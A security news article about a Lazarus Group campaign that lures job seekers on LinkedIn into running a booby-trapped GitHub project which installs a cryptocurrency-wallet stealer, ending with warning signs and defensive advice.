According to a recent report from Bitdefender security researchers, the APT Lazarus hacking group is launching a new attack campaign through fake job invitations on LinkedIn, spreading malware that steals information from victims' cryptocurrency wallets.

Lazarus Group, also known as APT38, is a cybercriminal organization believed to be linked to the North Korean government. The group has been responsible for numerous cyberattacks causing significant financial damage in the Asia-Pacific region since 2009. Notably, Vietnam’s Tiên Phong Commercial Joint Stock Bank (TPBank) was once a victim of Lazarus, suffering a loss of approximately $1 million in one of the group’s attacks.

Attack Scenario

The latest campaign was discovered recently when the group attempted to contact a Bitdefender security researcher through the LinkedIn recruitment platform.

The hackers created job listings for a decentralized cryptocurrency exchange. With attractive compensation, flexible working hours, and remote work opportunities, these fake job offers easily lured many victims. Additionally, the hackers also created fraudulent job postings related to the tourism and finance sectors.

The victims go through virtual job interviews, are asked to provide their CVs, and are also required to link their personal repository on GitHub. This is believed to be an information-gathering tactic that also adds legitimacy to the conversation, preventing the victims from becoming suspicious.

After receiving the requested link, the hackers will share a repository containing an MVP (minimum viable product) with the victim while also posing related questions to guide them into executing the corresponding demos.

The code received by the victim initially appears harmless; however, part of it is obfuscated and contains a script that automatically downloads malware from a third party. This malware is designed for cross-platform data theft and can be deployed on Windows, macOS, and Linux. The information stealer specifically targets popular cryptocurrency wallets through browser extensions, identified by the following IDs:

Once deployed on the system, the malware downloads an additional Python file named main99_65.py along with supplementary modules, serving as a foundation for further malicious activities such as deploying a backdoor, a stealer, a keylogger, and data collection. The information it gathers includes:

• Infected machine name

• Username

• Operating system details

• CPU information, including core and thread count

• GPU information

• RAM details

• Public IP address and physical location

Recommendations

The growth of job platforms has made career opportunities more accessible, but it has also introduced risks by enabling cyberattacks that leverage social engineering techniques. Everyone should remain vigilant when receiving unclear or suspicious job offers and should also improve their awareness of cybersecurity threats.

Bitdefender security researchers have highlighted several warning signs and provided the following recommendations:

• Warning Signs

  • Suspicious job descriptions: Be cautious if there is no corresponding job posting on LinkedIn or if the job description is vague and lacks details.

  • Unusual repositories: Watch out for repositories owned by users with randomly generated names, lacking documentation or legitimate contributions. Problematic recruiter communication: Red flags include excessive spelling errors, refusal to provide alternative contact methods (such as a company email or phone number), or overly persistent recruitment attempts.

• Recommendations

  • Do not run unverified code: Use virtual machines, sandboxes, or online platforms to safely analyze any received code.

  • Verify authenticity: Cross-check job invitations with official company websites and verify the sender's email domain.

  • Stay vigilant: Be extremely cautious when asked to disclose sensitive personal information during job-related communications.

References

1. Bitdenfender Anti-Malware Research: https://www.bitdefender.com/en-us/blog/labs/lazarus-group-targets-organizations-with-sophisticated-linkedin-recruiting-scam